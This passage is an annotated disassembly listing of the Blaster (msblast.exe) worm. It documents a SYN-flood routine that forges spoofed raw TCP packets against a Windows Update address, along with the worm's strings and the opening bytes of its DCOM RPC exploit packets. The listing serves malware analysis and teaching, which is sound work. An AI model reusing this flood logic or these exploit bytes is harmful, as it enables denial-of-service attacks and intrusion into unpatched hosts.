endp .text:00401F33 .text:00401F36 IPv4 header: .text:00401F36 .text:00401F36 -14 BYTE version / header len .text:00401F36 -13 BYTE type of service .text:00401F36 -12 WORD total length .text:00401F36 -10 WORD identification .text:00401F36 -0E BYTE flags .text:00401F36 -0D BYTE frag offset .text:00401F36 -0C BYTE time-to-live .text:00401F36 -0B BYTE protocol .text:00401F36 -0A WORD checksum .text:00401F36 -08 DWORD source IP address .text:00401F36 -04 DWORD dest IP address .text:00401F36 .text:00401F36 TCP header: .text:00401F36 .text:00401F36 -28 WORD source port .text:00401F36 -26 WORD dest port .text:00401F36 -24 DWORD sequence number .text:00401F36 -20 DWORD ack number .text:00401F36 -1C BYTE header length .text:00401F36 -1B BYTE flags .text:00401F36 -1A WORD window size .text:00401F36 -18 WORD checksum .text:00401F36 -16 WORD urgent pointer .text:00401F36 .text:00401F36 IP "pseudoheader" for computing TCP checksum (RFC 793): .text:00401F36 .text:00401F36 -70 DWORD source IP address .text:00401F36 -6C DWORD dest 
IP address .text:00401F36 -68 BYTE 0 .text:00401F36 -67 BYTE protocol (6: TCP) .text:00401F36 -66 WORD TCP header length .text:00401F36 .text:00401F36 ; =============== S U B R O U T I N E ======================================= .text:00401F36 .text:00401F36 ; Attributes: bp-based frame .text:00401F36 .text:00401F36 sendTCP80SYN proc near ; CODE XREF: WUSYNFloodThread+55^p .text:00401F36 .text:00401F36 temprand2 = dword ptr -9Ch .text:00401F36 temprand1 = dword ptr -98h .text:00401F36 name = byte ptr -92h .text:00401F36 destport = word ptr -82h .text:00401F36 to = sockaddr ptr -80h .text:00401F36 pseudoheader = byte ptr -70h .text:00401F36 buf = byte ptr -64h .text:00401F36 tcpheader = byte ptr -28h .text:00401F36 ipv4header = byte ptr -14h .text:00401F36 dwDestIP = dword ptr 8 .text:00401F36 s = dword ptr 0Ch .text:00401F36 .text:00401F36 push ebp .text:00401F37 mov ebp, esp .text:00401F39 sub esp, 9Ch .text:00401F3F push ebx .text:00401F40 push esi .text:00401F41 push edi .text:00401F42 .text:00401F42 Initialization .text:00401F42 .text:00401F42 lea edi, [ebp+buf] .text:00401F45 lea esi, ds:4047B0h ; g_zerobuf60[] .text:00401F4B mov ecx, 0Fh .text:00401F50 rep movsd ; copy 60 byte buffer of zeroes into buf .text:00401F52 mov [ebp+destport], 50h ; destination port (80) .text:00401F5B call GetTickCount .text:00401F60 push eax .text:00401F61 call srand ; seed random number generator with GetTickCount() .text:00401F66 .text:00401F66 Create random source address for spoofing .text:00401F66 .text:00401F66 call rand .text:00401F6B mov [ebp+temprand1], eax .text:00401F71 call rand .text:00401F76 mov ecx, 0FFh .text:00401F7B cdq .text:00401F7C idiv ecx .text:00401F7E push edx ; fourth octet (random 0..254) .text:00401F7F mov edi, [ebp+temprand1] .text:00401F85 mov eax, edi .text:00401F87 mov ecx, 0FFh .text:00401F8C cdq .text:00401F8D idiv ecx .text:00401F8F push edx ; third octet (random 0..254) .text:00401F90 push ds:synspoofoctet2 .text:00401F96 push ds:synspoofoctet1 
.text:00401F9C push offset aI_I_I_I ; "%i.%i.%i.%i" .text:00401FA1 lea edi, [ebp+name] .text:00401FA7 push edi .text:00401FA8 call sprintf .text:00401FAD lea eax, [ebp+name] .text:00401FB3 push eax ; name .text:00401FB4 call lookupIPAddr .text:00401FB9 mov ebx, eax ; save source address to spoof in EBX .text:00401FBB .text:00401FBB Fill in target address (sockaddr) struct .text:00401FBB .text:00401FBB mov [ebp+to.sa_family], 2 ; AF_INET .text:00401FC1 movzx eax, [ebp+destport] .text:00401FC8 push eax ; hostshort .text:00401FC9 call htons .text:00401FCE mov edi, eax .text:00401FD0 mov word ptr [ebp+to.sa_data], di ; destination port (80) .text:00401FD4 mov eax, [ebp+dwDestIP] .text:00401FD7 mov dword ptr [ebp+to.sa_data+2], eax .text:00401FDA .text:00401FDA Construct IPv4 header .text:00401FDA .text:00401FDA mov [ebp+ipv4header], 45h ; first byte of raw IP packet: .text:00401FDA ; IPv4 / 20-byte header .text:00401FDE push 28h ; hostshort .text:00401FE0 call htons .text:00401FE5 mov edi, eax .text:00401FE7 mov word ptr [ebp+ipv4header+2], di ; total length = 40 bytes .text:00401FEB mov word ptr [ebp+ipv4header+4], 1 .text:00401FF1 mov word ptr [ebp+ipv4header+6], 0 ; flags = 0 .text:00401FF7 mov [ebp+ipv4header+8], 80h ; TTL = 128 .text:00401FFB mov [ebp+ipv4header+9], 6 ; protocol = TCP (6) .text:00401FFF mov word ptr [ebp+ipv4header+0Ah], 0 ; IP checksum .text:00402005 mov eax, [ebp+dwDestIP] .text:00402008 mov dword ptr [ebp+ipv4header+10h], eax ; destination IP (Windows Update) .text:0040200B .text:0040200B Begin constructing TCP header .text:0040200B .text:0040200B movzx eax, [ebp+destport] .text:00402012 push eax ; hostshort .text:00402013 call htons .text:00402018 mov edi, eax .text:0040201A mov word ptr [ebp+tcpheader+2], di ; destination port (80) .text:0040201E and dword ptr [ebp+tcpheader+8], 0 ; zero out ack number .text:00402022 mov [ebp+tcpheader+0Ch], 50h ; header length (50h --> 20 bytes) .text:00402026 mov [ebp+tcpheader+0Dh], 2 ; flags: 2 = SYN 
.text:0040202A push 4000h ; hostshort .text:0040202F call htons .text:00402034 mov edi, eax .text:00402036 mov word ptr [ebp+tcpheader+0Eh], di ; window size: 16384 .text:0040203A mov word ptr [ebp+tcpheader+12h], 0 ; urgent ptr .text:00402040 mov word ptr [ebp+tcpheader+10h], 0 ; TCP checksum .text:00402046 mov eax, dword ptr [ebp+ipv4header+10h] .text:00402049 .text:00402049 Construct IP pseudoheader .text:00402049 .text:00402049 mov dword ptr [ebp+pseudoheader+4], eax ; destination IP (windowsupdate.com) .text:0040204C mov [ebp+pseudoheader+8], 0 ; store 0 in pseudoheader .text:00402050 mov [ebp+pseudoheader+9], 6 ; store protocol (6: TCP) in pseudoheader .text:00402054 push 14h ; hostshort .text:00402056 call htons .text:0040205B mov edi, eax .text:0040205D mov word ptr [ebp+pseudoheader+0Ah], di ; store TCP header size (20) in pseudoheader .text:00402061 .text:00402061 Finish filling in IPv4 and TCP headers .text:00402061 .text:00402061 mov dword ptr [ebp+ipv4header+0Ch], ebx ; source address .text:00402064 call rand .text:00402069 mov ecx, 3E8h .text:0040206E cdq .text:0040206F idiv ecx .text:00402071 mov edi, edx .text:00402073 add edi, 3E8h .text:00402079 and edi, 0FFFFh ; (rand() % 1000) + 1000 .text:0040207F push edi ; hostshort .text:00402080 call htons .text:00402085 mov edi, eax .text:00402087 mov word ptr [ebp+tcpheader], di ; first bytes of TCP header: .text:00402087 ; source port = random 1000..1999 .text:0040208B call rand .text:00402090 mov [ebp+temprand2], eax .text:00402096 call rand .text:0040209B mov edi, [ebp+temprand2] .text:004020A1 shl edi, 10h .text:004020A4 or edi, eax .text:004020A6 and edi, 0FFFFh .text:004020AC push edi ; hostshort .text:004020AD call htons ; htons( ((rand() << 16) | rand()) & 0xFFFF ) .text:004020B2 mov edi, eax .text:004020B4 and edi, 0FFFFh .text:004020BA mov dword ptr [ebp+tcpheader+4], edi ; sequence number .text:004020BD mov dword ptr [ebp+pseudoheader], ebx ; source address .text:004020C0 .text:004020C0 
Calculate and store IPv4 and TCP checksums .text:004020C0 .text:004020C0 push 0Ch .text:004020C2 lea eax, [ebp+pseudoheader] .text:004020C5 push eax .text:004020C6 lea eax, [ebp+buf] .text:004020C9 push eax .text:004020CA call memcpy ; copy IP pseudoheader into buf[] .text:004020CF push 14h .text:004020D1 lea eax, [ebp+tcpheader] .text:004020D4 push eax .text:004020D5 lea eax, [ebp+buf+0Ch] ; &(buf[0x0C]) .text:004020D8 push eax .text:004020D9 call memcpy ; copy TCP header after pseudoheader into buf[] .text:004020DE push 20h ; dwLength .text:004020E0 lea eax, [ebp+buf] .text:004020E3 push eax ; lpData .text:004020E4 call computeChecksum ; compute checksum of (IP pseudoheader + TCP header) .text:004020E9 mov edi, eax .text:004020EB mov word ptr [ebp+tcpheader+10h], di ; store TCP checksum in TCP header .text:004020EF push 14h .text:004020F1 lea eax, [ebp+ipv4header] .text:004020F4 push eax .text:004020F5 lea eax, [ebp+buf] .text:004020F8 push eax .text:004020F9 call memcpy ; now copy IPv4 header into buf[] .text:004020FE push 14h .text:00402100 lea eax, [ebp+tcpheader] .text:00402103 push eax .text:00402104 lea eax, [ebp+buf+14h] ; &(buf[0x14]) .text:00402107 push eax .text:00402108 call memcpy ; copy TCP header after IPv4 header in buf[] .text:0040210D push 4 .text:0040210F push 0 .text:00402111 lea eax, [ebp+buf+28h] .text:00402114 push eax .text:00402115 call memset .text:0040211A push 28h ; dwLength: 28h (40) .text:0040211C lea eax, [ebp+buf] .text:0040211F push eax ; lpData: buf .text:00402120 call computeChecksum .text:00402125 mov edi, eax .text:00402127 mov word ptr [ebp+ipv4header+0Ah], di ; store IPv4 checksum in IPv4 header .text:0040212B .text:0040212B Send TCP SYN packet to destination IP address .text:0040212B .text:0040212B push 14h .text:0040212D lea eax, [ebp+ipv4header] .text:00402130 push eax .text:00402131 lea eax, [ebp+buf] .text:00402134 push eax .text:00402135 call memcpy ; copy IPv4 header to buffer .text:0040213A add esp, 78h .text:0040213D 
push 10h ; tolen .text:0040213F lea eax, [ebp+to] .text:00402142 push eax ; to .text:00402143 push 0 ; flags .text:00402145 push 28h ; len = 40 bytes .text:00402147 lea eax, [ebp+buf] .text:0040214A push eax ; buf .text:0040214B push [ebp+s] ; s .text:0040214E call sendto ; -- send 40-byte raw IP packet .text:00402153 pop edi .text:00402154 pop esi .text:00402155 pop ebx .text:00402156 leave .text:00402157 retn .text:00402157 sendTCP80SYN endp .text:00402157 .text:00402158 ; [00000006 BYTES: COLLAPSED FUNCTION htons. PRESS KEYPAD "+" TO EXPAND] .text:0040215E dd 9090h .text:00402162 align 4 .text:00402164 ; [00000006 BYTES: COLLAPSED FUNCTION ioctlsocket. PRESS KEYPAD "+" TO EXPAND] .text:0040216A align 8 .text:00402170 ; [00000006 BYTES: COLLAPSED FUNCTION inet_addr. PRESS KEYPAD "+" TO EXPAND] .text:00402176 dd 9090h .text:0040217A align 4 .text:0040217C ; [00000006 BYTES: COLLAPSED FUNCTION inet_ntoa. PRESS KEYPAD "+" TO EXPAND] .text:00402182 align 8 .text:00402188 ; [00000006 BYTES: COLLAPSED FUNCTION recvfrom. PRESS KEYPAD "+" TO EXPAND] .text:0040218E dd 9090h .text:00402192 align 4 .text:00402194 ; [00000006 BYTES: COLLAPSED FUNCTION select. PRESS KEYPAD "+" TO EXPAND] .text:0040219A align 8 .text:004021A0 ; [00000006 BYTES: COLLAPSED FUNCTION send. PRESS KEYPAD "+" TO EXPAND] .text:004021A6 dd 9090h .text:004021AA align 4 .text:004021AC ; [00000006 BYTES: COLLAPSED FUNCTION sendto. PRESS KEYPAD "+" TO EXPAND] .text:004021B2 align 8 .text:004021B8 ; [00000006 BYTES: COLLAPSED FUNCTION setsockopt. PRESS KEYPAD "+" TO EXPAND] .text:004021BE dd 9090h .text:004021C2 align 4 .text:004021C4 ; [00000006 BYTES: COLLAPSED FUNCTION socket. PRESS KEYPAD "+" TO EXPAND] .text:004021CA align 8 .text:004021D0 ; [00000006 BYTES: COLLAPSED FUNCTION gethostbyname. PRESS KEYPAD "+" TO EXPAND] .text:004021D6 dd 9090h .text:004021DA align 4 .text:004021DC ; [00000006 BYTES: COLLAPSED FUNCTION bind. 
PRESS KEYPAD "+" TO EXPAND] .text:004021E2 align 8 .text:004021E8 ; [00000006 BYTES: COLLAPSED FUNCTION gethostname. PRESS KEYPAD "+" TO EXPAND] .text:004021EE dd 9090h .text:004021F2 align 4 .text:004021F4 ; [00000006 BYTES: COLLAPSED FUNCTION closesocket. PRESS KEYPAD "+" TO EXPAND] .text:004021FA align 8 .text:00402200 ; [00000006 BYTES: COLLAPSED FUNCTION WSAStartup. PRESS KEYPAD "+" TO EXPAND] .text:00402206 dd 9090h .text:0040220A align 4 .text:0040220C ; [00000006 BYTES: COLLAPSED FUNCTION WSACleanup. PRESS KEYPAD "+" TO EXPAND] .text:00402212 align 8 .text:00402218 ; [00000006 BYTES: COLLAPSED FUNCTION connect. PRESS KEYPAD "+" TO EXPAND] .text:0040221E dd 9090h .text:00402222 align 4 .text:00402224 ; [00000006 BYTES: COLLAPSED FUNCTION getpeername. PRESS KEYPAD "+" TO EXPAND] .text:0040222A align 8 .text:00402230 ; [00000006 BYTES: COLLAPSED FUNCTION getsockname. PRESS KEYPAD "+" TO EXPAND] .text:00402236 dd 9090h .text:0040223A align 4 .text:0040223C ; [00000006 BYTES: COLLAPSED FUNCTION WSASocketA. PRESS KEYPAD "+" TO EXPAND] .text:00402242 align 8 .text:00402248 ; [00000006 BYTES: COLLAPSED FUNCTION InternetGetConnectedState. 
PRESS KEYPAD "+" TO EXPAND]
.text:0040224E dd 9090h
.text:00402252 align 4
.text:00402254
.text:00402254 ; =============== S U B R O U T I N E =======================================
.text:00402254
.text:00402254 ; Attributes: bp-based frame
.text:00402254
; CRT start-up helper (called from start+66): builds the lpCmdLine argument
; for WinMain by stepping past the program name in GetCommandLineA()'s
; result, then calls WinMain(GetModuleHandleA(NULL), 0, lpCmdLine, 1).
; Not worm logic -- this is the compiler's WinMain invoker.
;   EDI = cursor into the command line; becomes lpCmdLine.
;   Two paths: quoted program name (first char is '"'), or unquoted
;   (scan to the first space or NUL). Both then skip any following spaces.
.text:00402254 sub_402254 proc near ; CODE XREF: start+66^p
.text:00402254
.text:00402254 var_4 = dword ptr -4
.text:00402254
.text:00402254 push ebp
.text:00402255 mov ebp, esp
.text:00402257 push ecx ; reserves the 4-byte slot for var_4
.text:00402258 push edi
.text:00402259 call GetCommandLineA
.text:0040225E mov edi, eax ; edi = full command line (program name included)
.text:00402260 cmp byte ptr [edi], 22h ; does the program name start with '"' ?
.text:00402263 jnz short loc_402288 ; no -> unquoted scan below
.text:00402265 push 22h
.text:00402267 mov eax, edi
.text:00402269 inc eax
.text:0040226A push eax
.text:0040226B call strchr ; strchr(cmdline + 1, '"') -> closing quote
.text:00402270 add esp, 8
.text:00402273 mov [ebp+var_4], eax ; stored but never read again in this routine
.text:00402276 or eax, eax
.text:00402278 jz short loc_4022A3 ; no closing quote: lpCmdLine stays at the
.text:00402278 ; start of the whole line, opening quote included
.text:0040227A mov edi, eax
.text:0040227C inc edi ; edi = first char after the closing quote
.text:0040227D jmp short loc_402280
.text:0040227F ; ---------------------------------------------------------------------------
.text:0040227F
.text:0040227F loc_40227F: ; CODE XREF: sub_402254+2Fvj
.text:0040227F inc edi
.text:00402280
; skip spaces following the quoted program name
.text:00402280 loc_402280: ; CODE XREF: sub_402254+29^j
.text:00402280 cmp byte ptr [edi], 20h
.text:00402283 jz short loc_40227F
.text:00402285 jmp short loc_4022A3
.text:00402287 ; ---------------------------------------------------------------------------
.text:00402287
.text:00402287 loc_402287: ; CODE XREF: sub_402254+3Evj
.text:00402287 inc edi
.text:00402288
; unquoted program name: advance until NUL or space
.text:00402288 loc_402288: ; CODE XREF: sub_402254+F^j
.text:00402288 movsx eax, byte ptr [edi]
.text:0040228B or eax, eax
.text:0040228D jz short loc_402294 ; NUL: no arguments at all
.text:0040228F cmp eax, 20h
.text:00402292 jnz short loc_402287
.text:00402294
.text:00402294 loc_402294: ; CODE XREF: sub_402254+39^j
.text:00402294 jmp short loc_402297
.text:00402296 ; ---------------------------------------------------------------------------
.text:00402296
.text:00402296 loc_402296: ; CODE XREF: sub_402254+4Dvj
.text:00402296 inc edi
.text:00402297
; skip the spaces separating the program name from its arguments
.text:00402297 loc_402297: ; CODE XREF: sub_402254+40^j
.text:00402297 movsx eax, byte ptr [edi]
.text:0040229A or eax, eax
.text:0040229C jz short loc_4022A3
.text:0040229E cmp eax, 20h
.text:004022A1 jz short loc_402296
.text:004022A3
; edi now points at lpCmdLine (possibly an empty string)
.text:004022A3 loc_4022A3: ; CODE XREF: sub_402254+24^j
.text:004022A3 ; sub_402254+31^j ...
.text:004022A3 push 0 ; lpModuleName
.text:004022A5 call GetModuleHandleA ; eax = hInstance of this module
.text:004022AA push 1 ; nCmdShow = 1
.text:004022AC push edi ; lpCmdLine
.text:004022AD push 0 ; hPrevInstance (always 0 on Win32)
.text:004022AF push eax ; hInstance
.text:004022B0 call WinMain ; worm body starts here (see 00401250)
.text:004022B5 pop edi
.text:004022B6 leave
.text:004022B7 retn ; returns WinMain's value in eax to start
.text:004022B7 sub_402254 endp
.text:004022B7
.text:004022B8
.text:004022B8 ; =============== S U B R O U T I N E =======================================
.text:004022B8
.text:004022B8
; Stack probe in the style of the CRT's chkstk helper (called from
; infectTarget+8, which needs a large local buffer; the exact size it
; requests is not visible here).
;   In:  EAX = number of bytes to reserve on the stack
;   Out: ESP lowered by EAX, with one dword touched in every 4 KiB page
;        so the stack guard page is committed one page at a time instead
;        of being jumped over (a skipped guard page would fault).
;   Clobbers ECX, flags. Must be entered by CALL: the return address is
;   popped into ECX before ESP moves and the routine returns with JMP ECX.
.text:004022B8 allocstackspace proc near ; CODE XREF: infectTarget+8^p
.text:004022B8 pop ecx ; ecx = return address (stack is about to move)
.text:004022B9
.text:004022B9 loc_4022B9: ; CODE XREF: allocstackspace+14vj
.text:004022B9 sub esp, 1000h ; step down one page
.text:004022BF sub eax, 1000h ; bytes still to reserve
.text:004022C4 test [esp], eax ; touch the page (read only; result unused)
.text:004022C7 cmp eax, 1000h
.text:004022CC jnb short loc_4022B9 ; unsigned: loop while >= one page remains
.text:004022CE sub esp, eax ; final partial page
.text:004022D0 test [esp], eax ; touch it as well
.text:004022D3 jmp ecx ; return to caller
.text:004022D3 allocstackspace endp
.text:004022D3
.text:004022D3 ; ---------------------------------------------------------------------------
.text:004022D5 align 4
.text:004022D8 ; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
.text:004022DE dd 9090h
.text:004022E2 align 4
.text:004022E4 ; [00000006 BYTES: COLLAPSED FUNCTION ExitThread. PRESS KEYPAD "+" TO EXPAND]
.text:004022EA align 8
.text:004022F0 ; [00000006 BYTES: COLLAPSED FUNCTION GetCommandLineA. PRESS KEYPAD "+" TO EXPAND]
.text:004022F6 dd 9090h
.text:004022FA align 4
.text:004022FC ; [00000006 BYTES: COLLAPSED FUNCTION GetDateFormatA. PRESS KEYPAD "+" TO EXPAND]
.text:00402302 align 8
.text:00402308 ; [00000006 BYTES: COLLAPSED FUNCTION GetLastError.
PRESS KEYPAD "+" TO EXPAND] .text:0040230E dd 9090h .text:00402312 align 4 .text:00402314 ; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND] .text:0040231A align 8 .text:00402320 ; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA. PRESS KEYPAD "+" TO EXPAND] .text:00402326 dd 9090h .text:0040232A align 4 .text:0040232C ; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle. PRESS KEYPAD "+" TO EXPAND] .text:00402332 align 8 .text:00402338 ; [00000006 BYTES: COLLAPSED FUNCTION GetTickCount. PRESS KEYPAD "+" TO EXPAND] .text:0040233E dd 9090h .text:00402342 align 4 .text:00402344 ; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND] .text:0040234A align 8 .text:00402350 ; [00000006 BYTES: COLLAPSED FUNCTION CreateMutexA. PRESS KEYPAD "+" TO EXPAND] .text:00402356 dd 9090h .text:0040235A align 4 .text:0040235C ; [00000006 BYTES: COLLAPSED FUNCTION Sleep. PRESS KEYPAD "+" TO EXPAND] .text:00402362 align 8 .text:00402368 ; [00000006 BYTES: COLLAPSED FUNCTION TerminateThread. PRESS KEYPAD "+" TO EXPAND] .text:0040236E dd 9090h .text:00402372 align 4 .text:00402374 ; [00000006 BYTES: COLLAPSED FUNCTION CreateThread. PRESS KEYPAD "+" TO EXPAND] .text:0040237A align 8 .text:00402380 ; [00000006 BYTES: COLLAPSED FUNCTION RegCloseKey. PRESS KEYPAD "+" TO EXPAND] .text:00402386 dd 9090h .text:0040238A align 4 .text:0040238C ; [00000006 BYTES: COLLAPSED FUNCTION RegCreateKeyExA. PRESS KEYPAD "+" TO EXPAND] .text:00402392 align 8 .text:00402398 ; [00000006 BYTES: COLLAPSED FUNCTION RegSetValueExA. PRESS KEYPAD "+" TO EXPAND] .text:0040239E dd 9090h .text:004023A2 align 4 .text:004023A4 ; [00000006 BYTES: COLLAPSED FUNCTION __GetMainArgs. PRESS KEYPAD "+" TO EXPAND] .text:004023AA align 8 .text:004023B0 ; [00000006 BYTES: COLLAPSED FUNCTION atoi. PRESS KEYPAD "+" TO EXPAND] .text:004023B6 dd 9090h .text:004023BA align 4 .text:004023BC ; [00000006 BYTES: COLLAPSED FUNCTION exit. 
PRESS KEYPAD "+" TO EXPAND] .text:004023C2 align 8 .text:004023C8 ; [00000006 BYTES: COLLAPSED FUNCTION fclose. PRESS KEYPAD "+" TO EXPAND] .text:004023CE dd 9090h .text:004023D2 align 4 .text:004023D4 ; [00000006 BYTES: COLLAPSED FUNCTION fopen. PRESS KEYPAD "+" TO EXPAND] .text:004023DA align 8 .text:004023E0 ; [00000006 BYTES: COLLAPSED FUNCTION fread. PRESS KEYPAD "+" TO EXPAND] .text:004023E6 dd 9090h .text:004023EA align 4 .text:004023EC ; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND] .text:004023F2 align 8 .text:004023F8 ; [00000006 BYTES: COLLAPSED FUNCTION memset. PRESS KEYPAD "+" TO EXPAND] .text:004023FE dd 9090h .text:00402402 align 4 .text:00402404 ; [00000006 BYTES: COLLAPSED FUNCTION raise. PRESS KEYPAD "+" TO EXPAND] .text:0040240A align 8 .text:00402410 ; [00000006 BYTES: COLLAPSED FUNCTION rand. PRESS KEYPAD "+" TO EXPAND] .text:00402416 dd 9090h .text:0040241A align 4 .text:0040241C ; [00000006 BYTES: COLLAPSED FUNCTION signal. PRESS KEYPAD "+" TO EXPAND] .text:00402422 align 8 .text:00402428 ; [00000006 BYTES: COLLAPSED FUNCTION sprintf. PRESS KEYPAD "+" TO EXPAND] .text:0040242E dd 9090h .text:00402432 align 4 .text:00402434 ; [00000006 BYTES: COLLAPSED FUNCTION srand. PRESS KEYPAD "+" TO EXPAND] .text:0040243A align 8 .text:00402440 ; [00000006 BYTES: COLLAPSED FUNCTION strchr. PRESS KEYPAD "+" TO EXPAND] .text:00402446 dd 9090h .text:0040244A align 4 .text:0040244C ; [00000006 BYTES: COLLAPSED FUNCTION strtok. PRESS KEYPAD "+" TO EXPAND] .text:00402452 align 8 .text:00402452 _text ends .text:00402452 .bss:00403000 ; Section 2. (virtual address 00003000) .bss:00403000 ; Virtual size : 0000013C ( 316.) .bss:00403000 ; Section size in file : 00000000 ( 0.) .bss:00403000 ; Offset to raw data for section: 00000000 .bss:00403000 ; Flags C0000080: Bss Readable Writable .bss:00403000 ; Alignment : 16 bytes ? 
.bss:00403000 ; --------------------------------------------------------------------------- .bss:00403000 .bss:00403000 ; Segment type: Uninitialized .bss:00403000 ; Segment permissions: Read/Write .bss:00403000 _bss segment para public 'BSS' use32 .bss:00403000 assume cs:_bss .bss:00403000 ;org 403000h .bss:00403000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing .bss:00403000 ; char cp .bss:00403000 cp db 10h dup(?) ; DATA XREF: infect20Hosts+91^o .bss:00403000 ; infect20Hosts+9E^o ... .bss:00403010 octet2 dd ? ; DATA XREF: WinMain+1C6^w .bss:00403010 ; WinMain+219^r ... .bss:00403014 synspoofoctet1 dd ? ; DATA XREF: WinMain+103^w .bss:00403014 ; WinMain+214^w ... .bss:00403018 db ? ; .bss:00403019 db ? ; .bss:0040301A db ? ; .bss:0040301B db ? ; .bss:0040301C db ? ; .bss:0040301D db ? ; .bss:0040301E db ? ; .bss:0040301F db ? ; .bss:00403020 ; CHAR Filename .bss:00403020 Filename db 104h dup(?) ; DATA XREF: WinMain+B9^o .bss:00403020 ; TFTPServerThread+BF^o .bss:00403020 ; 260 (104h) = MAX_PATH .bss:00403124 ; SOCKET s .bss:00403124 s dd ? ; DATA XREF: TFTPServerThread+21^w .bss:00403124 ; TFTPServerThread+6B^r ... .bss:00403128 octet1 dd ? ; DATA XREF: WinMain+1A9^w .bss:00403128 ; WinMain+20F^r ... .bss:0040312C octet4 dd ? ; DATA XREF: WinMain+E0^w .bss:0040312C ; incrementOctets^r ... .bss:00403130 octet3 dd ? ; DATA XREF: WinMain+1E6^w .bss:00403130 ; WinMain+209^w ... .bss:00403134 dwWhichRetAddr dd ? ; DATA XREF: WinMain+246^w .bss:00403134 ; WinMain+262^w ... .bss:00403138 synspoofoctet2 dd ? ; DATA XREF: WinMain+116^w .bss:00403138 ; WinMain+21E^w ... .bss:00403138 _bss ends .bss:00403138 .data:0040313C ; Section 3. (virtual address 00004000) .data:0040313C ; Virtual size : 0000088C ( 2188.) .data:0040313C ; Section size in file : 0000088C ( 2188.) .data:0040313C ; Offset to raw data for section: 00001A00 .data:0040313C ; Flags C0000040: Data Readable Writable .data:0040313C ; Alignment : 16 bytes ? 
.data:0040313C ; --------------------------------------------------------------------------- .data:0040313C .data:0040313C ; Segment type: Pure data .data:0040313C ; Segment permissions: Read/Write .data:0040313C _data segment para public 'DATA' use32 .data:0040313C assume cs:_data .data:0040313C ;org 40313Ch .data:0040313C align 1000h .data:00404000 dd offset cp .data:00404004 dd 40313Ch .data:00404008 dd 8000h .data:0040400C dd 0 .data:00404010 dword_404010 dd 0 ; DATA XREF: .text:00401142^w .data:00404010 ; .text:0040115C^w ... .data:00404014 dword_404014 dd 0 ; DATA XREF: start+60^w .data:00404018 db 0 ; .data:00404019 db 0 ; .data:0040401A db 0 ; .data:0040401B db 0 ; .data:0040401C unk_40401C db 0 ; ; DATA XREF: start+B^o .data:0040401D db 0 ; .data:0040401E db 0 ; .data:0040401F db 0 ; .data:00404020 dword_404020 dd 0 ; DATA XREF: start+44^o .data:00404020 ; start+5A^r .data:00404024 dword_404024 dd 0 ; DATA XREF: start+3F^o .data:00404024 ; start+54^r .data:00404028 dword_404028 dd 0 ; DATA XREF: start+3A^o .data:00404028 ; start+4E^r .data:0040402C dword_40402C dd 0 ; DATA XREF: .text:004011AA^r .data:0040402C ; .text:004011BA^r .data:00404030 dword_404030 dd 0 ; DATA XREF: .text:004010AB^w .data:00404034 dword_404034 dd 0 ; DATA XREF: .text:004010B0^w .data:00404034 ; .text:004010C8^w .data:00404038 dwTFTPInProgress dd 0 ; DATA XREF: TFTPServerThread+C^w .data:00404038 ; TFTPServerThread+174^w ... .data:0040403C aMsblast_exe db 'msblast.exe',0 ; DATA XREF: WinMain+31^o .data:0040403C ; infectTarget+3BA^o ... .data:00404048 aIJustWantToSay db 'I just want to say LOVE YOU SAN!!',0 .data:0040406A aBillyGatesWhyD db 'billy gates why do you make this possible ? 
Stop making mone' .data:0040406A db 'y and fix your software!!',0 .data:004040C0 .data:004040C0 Static exploit packet components (from http://www.metasploit.com/tools/dcom.c) .data:004040C0 .data:004040C0 bindstr db 5, 0, 0Bh, 3, 10h, 0, 0, 0, 48h, 0, 0, 0, 7Fh, 0, 0, 0; 0 .data:004040C0 db 0D0h, 16h,0D0h, 16h, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0; 16 .data:004040C0 db 0A0h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 32 .data:004040C0 db 0, 0, 0, 0, 4, 5Dh, 88h, 8Ah,0EBh, 1Ch,0C9h, 11h, 9Fh,0E8h, 8, 0; 48 .data:004040C0 db 2Bh, 10h, 48h, 60h, 2, 0, 0, 0; 64 .data:00404108 request1 db 5, 0, 0, 3, 10h, 0, 0, 0,0E8h, 3, 0, 0,0E5h, 0, 0, 0; 0 .data:00404108 db 0D0h, 3, 0, 0, 1, 0, 4, 0, 5, 0, 6, 0, 1, 0, 0, 0; 16 .data:00404108 db 0, 0, 0, 0, 32h, 24h, 58h,0FDh,0CCh, 45h, 64h, 49h,0B0h, 70h,0DDh,0AEh; 32 .data:00404108 db 74h, 2Ch, 96h,0D2h, 60h, 5Eh, 0Dh, 0, 1, 0, 0, 0, 0, 0, 0, 0; 48 .data:00404108 db 70h, 5Eh, 0Dh, 0, 2, 0, 0, 0, 7Ch, 5Eh, 0Dh, 0, 0, 0, 0, 0; 64 .data:00404108 db 10h, 0, 0, 0, 80h, 96h,0F1h,0F1h, 2Ah, 4Dh,0CEh, 11h,0A6h, 6Ah, 0, 20h; 80 .data:00404108 db 0AFh, 6Eh, 72h,0F4h, 0Ch, 0, 0, 0, 4Dh, 41h, 52h, 42h, 1, 0, 0, 0; 96 .data:00404108 db 0, 0, 0, 0, 0Dh,0F0h,0ADh,0BAh, 0, 0, 0, 0,0A8h,0F4h, 0Bh, 0; 112 .data:00404108 db 60h, 3, 0, 0, 60h, 3, 0, 0, 4Dh, 45h, 4Fh, 57h, 4, 0, 0, 0; 128 .data:00404108 db 0A2h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 144 .data:00404108 db 38h, 3, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 160 .data:00404108 db 0, 0, 0, 0, 30h, 3, 0, 0, 28h, 3, 0, 0, 0, 0, 0, 0; 176 .data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh,0C8h, 0, 0, 0, 4Dh, 45h, 4Fh, 57h; 192 .data:00404108 db 28h, 3, 0, 0,0D8h, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0; 208 .data:00404108 db 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 